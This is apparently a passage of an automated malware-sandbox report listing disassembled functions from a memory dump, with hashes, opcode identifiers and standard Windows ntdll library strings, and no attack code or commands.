                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ea85d0c977e4a2ffcf4f55d39585b13a423083a2f84bbe7c82ecbc325f83be0
                                                          • Instruction ID: f43af17da12dd55f4ab09a052a849b5c62f8889206bd24265b6dd3bae82d8a96
                                                          • Opcode Fuzzy Hash: 4ea85d0c977e4a2ffcf4f55d39585b13a423083a2f84bbe7c82ecbc325f83be0
                                                          • Instruction Fuzzy Hash: 4B90022124545502D650715C44046164045B7E1211F59C421A0818994DC59989556326
                                                          Function 01582C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: da4c7e704f53f105093408e0bfff6901c7f463c38645ef6a09fcd1767dd254b3
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Function 01582890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: f9f91821b0945cc383ab9a5feee4cf3ba57f6a1e069ef9ff1234a6091f8f641d
                                                          • Instruction ID: 560ddc4157fa3e951fe53bbb1d7d1c5df53bd5f50ffc9865290bd97a343572ae
                                                          • Opcode Fuzzy Hash: f9f91821b0945cc383ab9a5feee4cf3ba57f6a1e069ef9ff1234a6091f8f641d
                                                          • Instruction Fuzzy Hash: 7C51E7B1A00216BFDF11EB9D888097EFBF8BB49240B508669F465EB641D334DE50CBA0
                                                          Function 015F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 62da2dc82bf7649585166077d45a8097b75f0ddcd68b261bfa8fa37b41d3f2e6
                                                          • Instruction ID: 8102a48dacbb8cda2b67cc4477067503fc6b755a130ad1e583b375e2a6cd9493
                                                          • Opcode Fuzzy Hash: 62da2dc82bf7649585166077d45a8097b75f0ddcd68b261bfa8fa37b41d3f2e6
                                                          • Instruction Fuzzy Hash: 5951F7B5A00646AFCB30DF9DC89497FBBF8FB84200F04885DE696CF641E6B4DA408760
                                                          Function 01577630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ExecuteOptions, xrefs: 015B46A0
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015B46FC
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015B4742
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015B4725
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 015B4787
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015B4655
                                                          • Execute=1, xrefs: 015B4713
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: acfba84301da1a9d93526fc8ddfceaa0d9aeef425bd6e2b3be99e232fbff8a64
                                                          • Instruction ID: 95cdcef3426fb5201973140c35edb88ca6623f738079059aad9acc9acb6fada9
                                                          • Opcode Fuzzy Hash: acfba84301da1a9d93526fc8ddfceaa0d9aeef425bd6e2b3be99e232fbff8a64
                                                          • Instruction Fuzzy Hash: EE51FD3160021A7AEF21AEA8FC8AFEE77A9BF59704F0404A9D505AF181D7719A45CF50
                                                          Function 0158B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: f041168cacb42bb34523634a303c153515c4900980cb196e9c4243e72d430434
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 4681E070E1124A8EEF25BE6CC8917FEBBB9BF45320F184619D861BF291C73498408B51
                                                          Function 015F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: 8ed2d63b5823b61fccda82c1bc43e65eb250aff6c4ae293b585f8cfc359736ad
                                                          • Instruction ID: d5dadecee8362e8dcbdf79556917534433d78627f45f7eb56bac784746694206
                                                          • Opcode Fuzzy Hash: 8ed2d63b5823b61fccda82c1bc43e65eb250aff6c4ae293b585f8cfc359736ad
                                                          • Instruction Fuzzy Hash: 6C2165BAA0011AABDB11DF79CC40EEF7BF9FF54640F44011AEA05EB240E730DA018BA5
                                                          Function 0156F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015B02BD
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015B02E7
                                                          • RTL: Re-Waiting, xrefs: 015B031E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: 3c3b4ca372b82fc48f2a22a961cb0dcebf1348ca08ad299a637f629c6b756eaa
                                                          • Instruction ID: a674e4fb0bc523ed967d8f8c0b71c0d0f4af3b773f92901ec1bd7f946d6c93fa
                                                          • Opcode Fuzzy Hash: 3c3b4ca372b82fc48f2a22a961cb0dcebf1348ca08ad299a637f629c6b756eaa
                                                          • Instruction Fuzzy Hash: 1BE1BE30A087429FE725CF28D894B6ABBE4BB84314F140A5EF5A58F2E1D774D945CB82
                                                          Function 0157B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015B728C
                                                          Strings
                                                          • RTL: Re-Waiting, xrefs: 015B72C1
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015B7294
                                                          • RTL: Resource at %p, xrefs: 015B72A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: dda452983faa896c13a732d123bc374b3ceff7c0dd35e263b1daa6cfc4fae61c
                                                          • Instruction ID: 9a9cbc6ac72bcec2bb6bfe458a9f45bbbbbacbd4580b7df5b96fdf1c73e1ddff
                                                          • Opcode Fuzzy Hash: dda452983faa896c13a732d123bc374b3ceff7c0dd35e263b1daa6cfc4fae61c
                                                          • Instruction Fuzzy Hash: 6141D231600207AFD721DE69CC82FAAB7E6FB99710F140619F955EF280DB31E84287D1
                                                          Function 015F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 5fc903e709bb08d993a2499c57e350d026b9d14cd4bf531d2fc0e43b1551afe1
                                                          • Instruction ID: 4539a4a9f5300f54ac530a4c949458a699031029d7179cfc0662cda0866ab074
                                                          • Opcode Fuzzy Hash: 5fc903e709bb08d993a2499c57e350d026b9d14cd4bf531d2fc0e43b1551afe1
                                                          • Instruction Fuzzy Hash: D23178B2A006199FDB60DF2DCC40BEEB7F8FF54610F444559E949E7240EB30DA448BA0
                                                          Function 01549126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 0fded06efbf40016d11d947e523caac0eeb3eb89edfc60270b32ef7119abe39e
                                                          • Instruction ID: a0e168fdcb4b4ef6e7936fcfdf9e022ac020d06ef37f47588903b001a3f5765c
                                                          • Opcode Fuzzy Hash: 0fded06efbf40016d11d947e523caac0eeb3eb89edfc60270b32ef7119abe39e
                                                          • Instruction Fuzzy Hash: F8811D71D4126A9BDB31CB54CC45BEEB7B4BF48754F0041EAAA19BB240D7705E84CFA0
                                                          Function 015CCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 015CCFBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: CallFilterFunc@8
                                                          • String ID: @$@4Cw@4Cw
                                                          • API String ID: 4062629308-3101775584
                                                          • Opcode ID: 6b28a03d69c8c19ff0878eedd35d8d618a0af7f84c7806ef58ce8bf05ef82bd5
                                                          • Instruction ID: 205563853f83baf8a6da2d7e682fb221b8b60fd8e88e9ced83b293b1e835c721
                                                          • Opcode Fuzzy Hash: 6b28a03d69c8c19ff0878eedd35d8d618a0af7f84c7806ef58ce8bf05ef82bd5
                                                          • Instruction Fuzzy Hash: 5D414971900216DFDB21AFE9C840AAEBBB8FF95B50F00442EE915EF254E734D941CBA5